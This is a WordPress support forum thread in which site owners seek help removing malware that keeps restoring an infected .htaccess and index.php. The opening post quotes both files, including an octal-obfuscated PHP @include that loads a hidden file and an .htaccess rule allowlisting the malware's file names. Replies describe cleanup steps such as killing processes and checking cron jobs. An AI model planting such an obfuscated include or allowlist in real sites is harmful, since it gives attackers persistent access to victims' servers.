• Hi,
    I have a very annoying issue with this malware..
    the malware has infected index.php and .httaccess file with permission 444 (which means can’t be edited unless we change it to 644)

    Everytime I delete or change the permission, it returns over and over again.
    I have deleted all wordpress files, (Except wp-content folder and wp-config file) but the malware on those 2 files stays

    I even have tried to change the ownership of those file too ROOT, but after few days, it switch back to Account as owner.. How could a malware change the file permission own by root back to normal account?

    This makes me crazy.. anyone has this experience and now how to solve it?

    here is the code of the httaccess and index.php

    <FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php)$">
     Order allow,deny
     Deny from all
    </FilesMatch>
    <FilesMatch "^(votes.php|index.php|wjsindex.php|lock666.php|font-editor.php|contents.php|wp-login.php|load.php|themes.php|admin.php|settings.php|bottom.php|years.php|alwso.php|service.php|license.php|module.php)$">
     Order allow,deny
     Allow from all
    </FilesMatch>
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . index.php [L]
    </IfModule>

    <?php @include(“\167\160\55\151\156\143\154\165\144\145\163\57\151\155\141\147\145\163\57\154\151\143\145\156\163\145\56\164\170\164”); ?>
    <?php
    define( ‘WP_USE_THEMES’, true );
    require __DIR__ . ‘/wp-blog-header.php’;

Viewing 13 replies - 1 through 13 (of 13 total)
  • Hey @icactive!

    It really depends on your Hosting type, is it shared hosting? Is it VPS hosting?

    If it’s shared hosting, and you have multiple domains added to that hosting, the malware most likely will be all over the domains, and changing permissions for one domain will not solve a problem. If there are multiple domains, you should check all of them for a malware, and eliminate all of them at the same time. If you have only 1 website, suggestion would be to contact your Hosting Provider to give a hand.

    Anonymous User 17160716

    (@anonymized-17160716)

    Hey icactive,

    This makes me crazy.. anyone has this experience and now how to solve it?

    In a few words: disable PHP engine > kill the malicious PHP process (via SSH i.e.) > wipe the malware > enable PHP engine back.

    Hi @icactive

    I just suffered the same hack as you and I have exactly the same in my index.php..

    Unable to modify the index.php and .htaccess..

    I had a home page in Japanese etc..

    Did you find a solution?

    Thanks`

    Thread Starter icactive

    (@icactive)

    My temporary solution is to change the public_html ownership to ROOT.. off course after clean up the malware first & restart the httpd/nginex. so far it works just fine, the malware doesn’t come back.. but now ive got issue to update the plugins since it askes for the ftp access. ??

    Anonymous User 17160716

    (@anonymized-17160716)

    yorel1992,

    Did you find a solution?

    In a few words: disable PHP engine > kill the malicious PHP process (via SSH i.e.) > wipe the malware > enable PHP engine back.

    icactive,

    change the public_html ownership to ROOT

    So the next infection will be more venomous than the first time.

    You have to find his control file,Then delete!

    There’s no detail solution to drop here, except that solutions gonna viewed by the malware creator too. And we just help him/her to update his/her codes, and that’s gonna s*cks for next time.

    tho, that malware already removed from my site

    —————————-
    here’s ur hints : using the malware footprints it self
    —————————-
    – lock it ur site dir first ( change ownership other than ur SITE_USER )
    – identified .htaccess ( all dirs )
    – use grep and identified its contents
    – identified ur spool ( cron job : wget ), yes .. it using cron to get something from some site.
    – reboot ur server coz something run in ur memory server ( reboot is a must )
    —————————-

    hi
    i have the same problem
    and i see my database names and user in database has been changed
    i decoded the octal code in my files
    it refers to wp-include/images/license.txt but i dont have this file
    and i again stuck what should i do
    if some1 have solution please tell and help
    thanks`

    I had this same problem where .htaccess and index.php were recreated as soon as you deleted them.
    I eventually fixed this by going into SSH and

    1. Identifying processes running in the relevant folder (in my case was the folder that contained public_html folder, not public_html itself)
    2. There were about 3 processses running and one looked suspicious. I killed that and then I was able to delete the 2 files.

    thanks for you solution
    what did you do for your phpmyadmin database?
    i dont understand what you mean about (that contained public_html folder, not public_html itself) I would appreciate it if you could explain this more

    I didn’t do anything with database as such but once I had deleted the 2 malicious files I did restore my databse and files from a backup in case the malware had done anything in the database.

    I have path /home/xxxxxxxx/public_html (xxxxxxxx hides real name)
    I checked for processes running in /home/xxxxxxxx and found suspicious process that I killed.

    Hello @janak5

    I need same help but I cant findout any way, I think I am very near and I dont know how to stop the running process.

    Will you please help I also keep getting the index.php file , you can reply me to my email as well [email removed by moderator — please do not ask for off-forum contact]

    Moderator Steven Stern (sterndata)

    (@sterndata)

    Volunteer Forum Moderator

Viewing 13 replies - 1 through 13 (of 13 total)
  • The topic ‘infected .htaccess and index.php can’t be deleted’ is closed to new replies.